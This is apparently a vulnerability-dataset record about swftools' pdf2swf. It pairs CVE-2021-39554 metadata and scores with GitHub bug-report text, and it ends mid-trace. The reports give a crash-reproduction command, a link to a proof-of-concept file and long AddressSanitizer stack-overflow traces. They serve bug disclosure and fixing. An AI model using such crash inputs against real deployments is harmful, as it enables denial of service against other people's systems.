xpdf/Parser.cc:156 #310 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #311 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #312 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #313 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #314 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #315 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #316 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #317 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #318 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #319 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #320 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #321 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #322 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #323 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #324 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #325 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #326 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #327 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #328 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #329 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #330 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #331 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #332 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #333 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==68956==ABORTING ``` ## POC [stack-overflow-grealloc-gmem-156.zip](https://github.com/matthiaskramm/swftools/files/5009961/stack-overflow-grealloc-gmem-156.zip)
A Segmentation fault in xpdf/gmem.cc:156
https://api.github.com/repos/swftools/swftools/issues/103/comments
0
2020-08-01T06:55:27Z
2020-08-01T06:55:27Z
https://github.com/swftools/swftools/issues/103
670,596,306
103
2,564
CVE-2021-39554
2021-09-20T16:15:13.227
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function Lexer::Lexer() located in Lexer.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/100" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/100" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/100
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./stack-overflow-Lexer-Lexer-53 ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==78316==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc6fc29ff8 (pc 0x7f8314fc71ff bp 0x000000000020 sp 0x7ffc6fc2a000 T0) #0 0x7f8314fc71fe (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb01fe) #1 0x7f8314fc6d47 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd47) #2 0x7f8314f39ebf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22ebf) #3 0x7f8314fb050e in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9950e) #4 0x560f6b08ed0e in Lexer::Lexer(XRef*, Stream*) xpdf/Lexer.cc:53 #5 0x560f6b0848da in XRef::fetch(int, int, Object*) xpdf/XRef.cc:809 #6 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #7 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #8 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #9 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #10 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #11 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #12 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #13 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #14 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #15 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #16 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #17 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #18 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #19 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #20 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #21 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #22 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #23 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #24 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #25 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #26 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #27 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #28 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #29 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #30 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #31 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #32 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #33 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #34 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #35 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #36 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #37 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #38 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #39 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #40 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #41 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #42 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #43 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #44 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #45 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #46 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #47 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #48 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #49 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #50 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #51 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #52 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #53 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #54 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #55 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #56 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #57 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #58 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #59 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #60 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #61 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #62 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #63 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #64 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #65 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #66 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #67 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #68 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #69 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #70 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #71 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #72 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #73 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #74 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #75 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #76 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #77 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #78 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #79 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #80 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #81 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #82 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #83 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #84 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #85 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #86 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #87 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #88 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #89 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #90 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #91 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #92 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #93 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #94 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #95 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #96 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #97 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #98 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #99 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #100 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #101 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #102 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #103 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #104 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #105 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #106 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #107 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #108 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #109 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #110 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #111 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #112 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #113 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #114 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #115 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #116 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #117 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #118 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #119 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #120 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #121 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #122 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #123 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #124 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #125 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #126 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #127 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #128 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #129 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #130 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #131 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #132 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #133 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #134 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #135 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #136 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #137 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #138 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #139 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #140 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #141 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #142 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #143 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #144 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #145 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #146 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #147 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #148 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #149 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #150 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #151 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #152 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #153 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #154 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #155 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #156 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #157 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #158 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #159 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #160 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #161 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #162 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #163 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #164 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #165 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #166 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #167 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #168 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #169 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #170 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #171 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #172 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #173 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #174 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #175 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #176 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #177 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #178 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #179 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #180 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #181 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #182 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #183 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #184 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #185 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #186 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #187 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #188 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #189 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #190 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #191 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #192 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #193 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #194 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #195 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #196 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #197 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #198 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #199 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #200 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #201 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #202 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #203 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #204 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #205 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #206 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #207 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #208 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #209 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #210 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #211 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #212 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #213 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #214 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #215 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #216 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #217 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #218 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #219 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #220 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #221 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #222 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #223 0x560f6b08bddf in Parser::makeStream(Object*, 